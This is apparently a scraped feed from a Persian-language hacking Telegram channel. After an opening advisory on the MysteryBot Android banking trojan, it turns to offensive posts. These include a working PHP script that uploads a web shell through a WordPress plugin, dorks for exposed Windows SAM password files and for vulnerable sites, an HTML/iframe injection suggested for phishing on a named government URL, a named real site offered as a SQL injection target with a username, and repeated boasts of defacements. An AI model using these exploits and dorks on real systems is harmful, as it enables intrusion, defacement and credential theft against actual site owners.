هشدار امنیتی !!!

ظهور بدافزار جديد بانکداری اندرويد مرتبط با بدافزار Lokibot

محققان اخیراً یک تروجان بانکداری جدید کشف کردند که نسخه‌های 7 و 8 اندروید را هدف قرار می‌دهد و از کارگزار فرمان و کنترل (C & C) مشابه با #تروجان‌های_LokiBotو Threat Fabricاستفاده می‌کند.

طبق نظریه‌ی محققان، این تروجان جدید که MysteryBotنامیده می‌شود، یا یک به‌روزرسانی از تروجان LokiBotو یا یک خانواده‌ی جدید بدافزار از همان فعالان تهدید است. این تهدید جدید سایبری، چندین تفاوت نسبت به LokiBotدارد. این تفاوت‌ها شامل نام، دستورات بهبودیافته و ارتباطات شبکه‌ی اصلاح‌شده است.

این بدافزار جدید علاوه‌بر ویژگی‌های عمومی تروجان‌های اندرویدی، دارای قابلیت‌های تماس با شماره‌ی تلفن داده‌شده، دریافت لیست اطلاعات تماس، تماس‌های انتقال‌یافته، کپی تمام پیامک‌ها، وارد‌کردن ضربات کلید، رمزگذاری فایل‌ها در ذخیره‌سازی خارجی، حذف همه‌ی مخاطبین، ارسال پیامک به تمام مخاطبین، تغییر برنامه‌ی پیش‌فرض پیامک، تماس با یک شماره‌ی USSD، حذف تمام پیامک‌ها و ارسال پیامک است.

علاوه‌بر این قابلیت‌ها، این تروجان می‌تواند صفحات ماحیگری را در بالای برنامه‌های مشروع قرار دهد و برای انجام این‌کار، از یک تکنولوژی جدید به‌منظور اطمینان از موفقیت در دستگاه‌های اندروید 7 و 8 استفاده می‌کند.

محدودیت‌های امنیتی پیشرفته‌ی لینوکس (SELinux) و سایر کنترل‌های امنیتی در نسخه‌های جدید اندروید، به معنای جلوگیری از نمایش بدافزارها بر روی برنامه‌های مشروع است. تکنیک جدیدی که MysteryBotاز آن استفاده می‌کند، مجوز "Android PACKAGE_USAGE_STATS" (مجوز استفاده‌ی مجدد) را برای ازبین‌بردن محدودیت‌ها دستکاری می‌کند و همچنین از "Accessibility Service" برای دریافت مجوزها سوءاستفاده می‌کند.

این بدافزار، خود را به‌عنوان یک برنامه‌ی Adobe Flash Playerتحمیل می‌کند و از قربانی می‌خواهد تا «مجوز دسترسی استفاده» که قابلیت‌های نامطلوبی را فراهم می‌کند، به آن اعطا کند. پس از آن تلاش می‌کند تا نام بسته‌های برنامه‌ها را در پیش‌زمینه نظارت کند. MysteryBotبا استفاده از هم‌پوشانی، بیش از 100 برنامه از جمله بانکداری تلفن همراه و برنامه‌های اجتماعی را هدف قرار می‌دهد.

MysteryBotهمچنین از روش جدیدی برای واردکردن ضربات کلید استفاده می‌کند. این بدافزار، محل کلیدهای روی صفحه را محاسبه می‌کند (درنظر می‌گیرد که هر کلید، دارای یک موقعیت مکانی روی صفحه است) و مختصات دیگری را بر روی هر یک از آن‌ها قرار می‌دهد (عرض و ارتفاع صفر پیکسل) که به او اجازه می‌دهد تا کلید فشار داده‌شده را ثبت کند.

به‌نظر می‌رسد که کد این بدافزار همچنان در حال توسعه است، زیرا هنوز قابلیت ارسال ضربات کلید واردشده به کارگزار C & Cرا ندارد.

MysteryBotهمچنین شامل قابلیت‌های قفل‌کننده/باج‌افزاری است که توسط داشبورد جداگانه‌ای از این تروجان مدیریت می‌شوند. این تروجان می‌تواند هر فایل را به‌طور جداگانه در پوشه‌ی ذخیره‌سازی خارجی رمزگذاری کند و سپس فایل های اصلی را حذف کند.

این بدافزار هر فایل را در بایگانی ZIPمحافظت‌شده با گذرواژه قرار می‌دهد، اما از گذرواژه‌ی مشابه برای همه‌ی بایگانی‌ها استفاده می‌کند (این کلید در طول زمان اجرا تولید می‌شود). هنگام تکمیل رمزگذاری، این بدافزار، یک گفتگو را نمایش می‌دهد که ادعا می‌کند قربانی، موارد خطرناکی را مشاهده کرده است و از او می‌خواهد تا از طریق پست الکترونیکی، با مهاجم تماس بگیرد.

محققان امنیتی دریافتند که گذرواژه‌ی این بدافزار فقط 8 کاراکتر طول دارد و از حروف الفبای لاتین (حروف بزرگ و کوچک) همراه با عدد استفاده می‌کند. علاوه‌براین، شناسه‌ی اختصاص داده‌شده به هر قربانی، تنها می‌تواند یک عدد بین 0 و 9999 باشد؛ به این معنی که همان شناسه می‌تواند در واقع به چندین قربانی اختصاص داده شود.

متخصصان فن‌آوری اطلاعات هنگام تجزیه و تحلیل ویژگی‌های باج‌افزاری MysteryBot، چندین خطا را شناسایی کردند. از آنجایی که گذرواژه‌ی این بدافزار فقط 8 کاراکتر طول دارد به‌راحتی می‌توان آن‌را با حمله‌ی جستجوی فراگیر به‌دست آورد. همچنین، این احتمال وجود دارد که شناسه‌ی منحصربه‌فرد داده‌شده به قربانی را بتوان با قربانی جدید با همان شناسه رونویسی کرد. بنابراین، قربانیان قدیم قادر نخواهند بود اطلاعات خود را بازیابی کنند.

به‌نظر می‌رسد Mysterybotیک گام جدید در توسعه‌ی نرم‌افزارهای مخرب بانکداری برای اندروید باشد که هم ویژگی‌های مخرب Lokibotو هم ویژگی‌های باج‌افزاری و دریافت ضربات کلید را دارد.

اموزش #نصب #sqplmap روی kali windows app
install #sqlmap on the #kali (kali) #win_10 (#windows_10) #app store !
@LeranExploit

اموزش #نصب #sqplmap روی kali windows app
install #sqlmap on the #kali (kali) #win_10 (#windows_10) #app store !
@LeranExploit

کیلاگر ضبط کننده ی کلید ها!
دوستان این کد priv8 بوده و از darkweb برداشته شده .

کیلاگر ضبط کننده ی کلید ها!

اموزش نوشتن #کرکر وردپرس
#WP #Cracker by #Evil_Boy
@LearnExploit
0Day.Today (Tele)

http://izkalite.gov.tr/portal/hata.php?mesaj=


میبیند که میتونید تگ های Html خودتون رو جلوی = بذارید و صفحه تغییر پیدا کنه
هکر ها یا کلاه برداران اینترنتی از این ها جهت فریب تارگت هاشون استفاده

میکنند و ممکنه با تگ iframe
ادرس صفحه فیک خودشون رو تو فریم بذارن و جهت دست یافتن به اطلاعات بانکی یا کاربری استفاده کنند.
#uzi

@LearnEXPLOiT

اموزش بدست اوردن
userName & password
سیستم ویندوز از طریق سایت 😄
------
#Find #SAM file with a #Dork (#GHDB) #OS_Windows
-----
@LearnExploit

اموزش بدست اوردن
userName & password
سیستم ویندوز از طریق سایت 😄
------
#Find #SAM file with a #Dork (#GHDB) #OS_Windows
------
شاید اول از هر چیزی بپرسید که SAM چیه ؟
دوستان SAM با همون
Security Account Manager
است که user and pass ویندوز رو درون خودش نگهداری میکنه !
فایل SAM ساختار ساده ای داره و از دو نوع الگوریتم Hashing به نام های LM (یه یک الگریتم ضعیف بوده) و NTLM (که یک الگریتم جدید و بهبود یافته است) .
شما میتونید فایل SAM ویندوز خودتون رو از مسیر زیر بدست بیارید :
%SystemRoot%/system32/config/SAM
(در مورد Dump این فاید بعدا صحبت میکنیم).
_
حالا روش بدست اوردن این فایل از طریق وب :
Dork : filetype:txt Administrator:500:
و تمام :)
نمونه :
https://www.albany.edu/~goel/classes/spring2010/itm604/pwfile.txt
=====================
#X0P4SH4
T.me/LearnExploit
0Day.Today

#Hacked By #X0P4SH4
https://mirror-h.org/zone/1605214/
heh... just for fun :)
@LearnExploit

#Hacked By #X0P4SH4
https://mirror-h.org/zone/1605222/
heh... just for fun :)
@LearnExploit
0Day.Today

#Hacked By #X0P4SH4
https://mirror-h.org/zone/1605229/
Heh.... just for fun :)
@LearnExploit
0Day.Today

#Hacked By #X0P4SH4
https://mirror-h.org/zone/1605233/
Heh.... just for fun :)
@LearnExploit
0Day.Today

#Hacked By #X0P4SH4
https://mirror-h.org/zone/1605238/
Heh.... just for fun :)
@LearnExploit
0Day.Today

#Hacked By #X0P4SH4
https://mirror-h.org/zone/1605241/
heh... just for fun
@LearnExploit
0Day.Today

نحوه ی هک (دیفیس) سایت توسط باگ Url Posting
#Url_Posting #Bug #Deface
-------------------------------
همان طور که از اسم سایت پیداست شما میتونید با استفاده از این باگ و به وسیله ی URL در سایت تغییراتی ایجاد کنید.
دورک مورد استفاده دراین باگ :

<Start ~ Dorks >

| site:ua "j images jdownloads screenshots version php j"
| site:ua "wp content uploads gravity forms index php option com jdownloads"
| site:ua "plugins editors jce tiny mce plugins cfg contactform"
| site:ua "cfg contactform"

<end ~ Dorks>
~~~~~~~~~~~~~~
POC ~ Exploiting :
just change Url of site ::::

http[s]://Example.me/HACKED-BY-X0P4SH4
:)
#X0P4SH4
t.me/LearnExploit
0Day.Today

#TarGet
~ :
http://www.janinedrayson.co.uk/

#User
~ :
Janinedr

#Pass
~:
Find By self :)

#Bug
~:
Sql
~~~~~~~~~~~~
Have Nice day !
I'm X0P4SH4

there [0Day.Today] Of telegram
ID : @LearnExploit

#WP(Wordpress) #Hacking #Plugin (Peugeot-Music-Plugin) #Exploit
-------------~______~---------

#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"

#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"

#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here

$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.

#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php

========================
#GOODNIGHT
#X0P4SH4

T.me/LearnExploit
0Day.Today